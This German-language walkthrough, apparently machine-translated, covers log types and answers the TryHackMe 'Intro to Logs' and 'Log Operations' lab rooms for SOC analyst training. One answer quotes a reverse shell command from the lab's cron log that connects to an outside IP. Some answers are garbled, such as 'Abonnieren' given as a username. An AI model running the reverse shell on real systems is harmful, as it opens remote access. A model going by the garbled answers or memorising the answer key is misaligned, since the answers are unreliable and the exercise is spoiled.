Wir haben eine Einführung in die Protokollierung gegeben, in der wir die Logik der Protokollerstellung und den Grund für die Erstellung von Protokollen besprochen haben. Protokolle werden erstellt und generiert, um die Leistung zu verfolgen, Sicherheitsvorfälle zu analysieren und ein Muster zu erstellen, anhand dessen zukünftige Ereignisse vorhergesagt werden können. Protokolle können Systemprotokolle, Anwendungsprotokolle, Sicherheitsprotokolle, Prüfprotokolle, Serverprotokolle und Datenbankprotokolle sein. Der Prozess der Protokollverwaltung beginnt mit dem Sammeln von Protokollen, deren Speicherung an einem zentralen Ort, dem Parsen der Protokolle und der anschließenden Analyse mithilfe von Protokollanalysetools und SIEM. Dies war Teil von TryHackMe-Einführung in Protokolle Walkthrough, das Teil des TryHackMe SOC Level 2 Track ist.
Dieser Beitrag enthält auch die Antworten für TryHackMe-Protokollvorgänge Zimmer.
Der komplette praktische Kurs zum Penetrationstest von Webanwendungen
Höhepunkte
Protokolldateien sind Aufzeichnungen von Ereignissen, die in einer Datei in Listenform festgehalten werden. Sie können alle möglichen Informationen über Ereignisse enthalten, die zu einem bestimmten Zeitpunkt stattgefunden haben. Jedes Gerät im Netzwerk erstellt Protokolldateien und gibt Ihnen so einen Überblick über die Geschehnisse.
Protokolle enthalten normalerweise fünf Bereiche mit Überschriften. Diese sind:
- Zeitstempel – die Zeit des Ereignisses.
- Protokollebene – wie schwerwiegend oder wichtig das Ereignis ist.
- Benutzername – wer das Ereignis verursacht hat.
- Dienst oder Anwendung – was das Ereignis verursacht hat.
- Ereignisbeschreibung – was ist passiert.
Protokolldateitypen
Ereignisprotokoll
– zeichnet Informationen zur Nutzung des Netzwerkverkehrs auf und verfolgt Anmeldeversuche, Anwendungsereignisse und fehlgeschlagene Kennworteingaben.Systemprotokoll
(oder Syslog) – zeichnet Betriebssystemereignisse auf, einschließlich Startmeldungen, Systemänderungen, Herunterfahren sowie Fehler und Warnungen.Serverprotokoll
– enthält eine Aufzeichnung von Aktivitäten in einem Textdokument, die sich auf einen bestimmten Server über einen bestimmten Zeitraum beziehen.Änderungsprotokoll
– listet Änderungen auf, die an einer Anwendung oder Datei vorgenommen wurden.Verfügbarkeitsprotokoll
–verfolgt Betriebszeit, Verfügbarkeit und Systemleistung.Autorisierungs- und Zugriffsprotokoll
– listet auf, wer auf Anwendungen oder Dateien zugreift.- Ressourcenprotokoll – bietet Informationen zu Verbindungsproblemen und etwaigen Kapazitätsproblemen.
Anwendungsprotokolle
Meldungen zu bestimmten Anwendungen, einschließlich Status, Fehlern, Warnungen usw.Prüfprotokolle
Aktivitäten im Zusammenhang mit Betriebsabläufen, die für die Einhaltung gesetzlicher Vorschriften von entscheidender Bedeutung sind.Sicherheitsprotokolle
Sicherheitsereignisse wie Anmeldungen, Berechtigungsänderungen, Firewall-Aktivität usw.Netzwerkprotokolle
Netzwerkverkehr, Verbindungen und andere netzwerkbezogene Ereignisse.Datenbankprotokolle
Aktivitäten innerhalb eines Datenbanksystems, wie etwa Abfragen und Aktualisierungen.Webserver-Protokolle
Von einem Webserver verarbeitete Anfragen, einschließlich URLs, Antwortcodes usw.
Raumantworten | TryHackMe Einführung in Protokolle
Wie heißt Ihr Kollege, der eine Notiz auf Ihrem Desktop hinterlassen hat?
Perry
Wie lautet der vollständige Pfad zur vorgeschlagenen Protokolldatei für die erste Untersuchung?
T1566/var/log/gitlab/nginx/access.logT1566
Welcher Protokolltyp wird basierend auf der Liste der Protokolltypen in dieser Aufgabe von der Protokolldatei verwendet, die im Hinweis aus Aufgabe 2 angegeben ist?
Webserver-Protokoll
Welches Protokollformat wird basierend auf der Liste der Protokollformate in dieser Aufgabe von der Protokolldatei verwendet, die im Hinweis aus Aufgabe 2 angegeben ist?
kombiniert
Welcher Benutzername erscheint nach der Konfiguration von rsyslog für sshd wiederholt in den sshd-Protokollen unter /var/log/websrv-02/rsyslog_sshd.log, was auf fehlgeschlagene Anmeldeversuche oder Brute-Force hinweist?
Abonnieren
Wie lautet die IP-Adresse von SIEM-02 basierend auf der rsyslog-Konfigurationsdatei /etc/rsyslog.d/99-websrv-02-cron.conf, die zum Überwachen von Cron-Nachrichten verwendet wird?
10.10.10.101
Welcher Befehl wird basierend auf den generierten Protokollen in /var/log/websrv-02/rsyslog_cron.log vom Root-Benutzer ausgeführt?
/bin/bash -c „/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1“
Wie viele Versionen alter komprimierter Protokolldateikopien werden basierend auf der Logrotate-Konfiguration /etc/logrotate.d/99-websrv-02_cron.conf aufbewahrt?
24
Wie hoch ist basierend auf der Logrotate-Konfiguration /etc/logrotate.d/99-websrv-02_cron.conf die Protokollrotationsfrequenz?
stündlich
Welchen Fehler zeigt „/var/log/websrv-02/rsyslog_cron.log“ beim Zugriff auf die Protokollanzeige-URL für nicht analysierte Rohprotokolldateien an, wenn die verschiedenen Filter ausgewählt werden?
kein Datumsfeld
Wie erfolgt die Standardisierung analysierter Daten in ein leichter lesbares und abfragbares Format?
Normalisierung
Wie läuft die Konsolidierung normalisierter Protokolle ab, um die Analyse von Aktivitäten im Zusammenhang mit einer bestimmten IP-Adresse zu verbessern?
Anreicherung
Raumantworten | TryHackMe-Log-Operationen
Welcher der angegebenen Protokollzwecke wäre geeignet, die Kosten für die Nutzung eines Dienstes zu messen?
Betriebsbereit
Welcher der angegebenen Protokollzwecke eignet sich zur Untersuchung von Anwendungsprotokollen auf Verbesserung und Stabilität?
Debuggen
Sie sind Berater und arbeiten für ein wachsendes Startup. Als Berater haben Sie an einer Sitzung zur Protokollkonfigurationsplanung teilgenommen. Das Unternehmen, für das Sie arbeiten, arbeitet daran, die Zahlungsinformationen konform zu verarbeiten. Der angegebene Fragensatz wird besprochen.
Auf welche Frage kann mit „So viel, wie in den PCI DSS-Anforderungen erwähnt“ geantwortet werden?
Wie viel müssen Sie loggen?
Die Sitzung geht weiter und Ihre Teamkollegen brauchen Ihre Hilfe; Sie verhandeln über das Protokollierungsbudget und die Betriebsdetails. Als Berater müssen Sie sie an einen wichtigen Punkt erinnern:
Welche Anforderungen sind nicht verhandelbar?
Betriebs- und Sicherheitsanforderungen
Ihr Team arbeitet an Richtlinien, um zu entscheiden, welche Protokolle gespeichert werden und welcher Teil für die Analyse verfügbar sein wird.
Welche der angegebenen Protokollierungsprinzipien würden umgesetzt und verbessert?
Archivierung und Barrierefreiheit
Ihr Team hat ein brandneues API-Logging-Produkt implementiert. Eines der Teammitglieder wurde mit der Erfassung der von diesem neuen Produkt generierten Protokolle beauftragt. Das Teammitglied meldete fortlaufende Fehler beim Übertragen der Protokolle auf die Prüfplattform.
Welche der genannten Schwierigkeiten tritt in diesem Fall auf?
Verarbeiten und Archivieren
Sie führen als Berater eine umfassende Risikobewertung durch und stellen fest, dass eines der Entwicklungsteams ein benutzerdefiniertes Skript zur Generierung von Protokollen für ein altes System implementiert hat, bei dem in einigen Phasen die Protokollierung ausgelassen wird.
Wie würden Sie das nennen? (Fehler oder Übung?)
Fehler
Video-Komplettlösung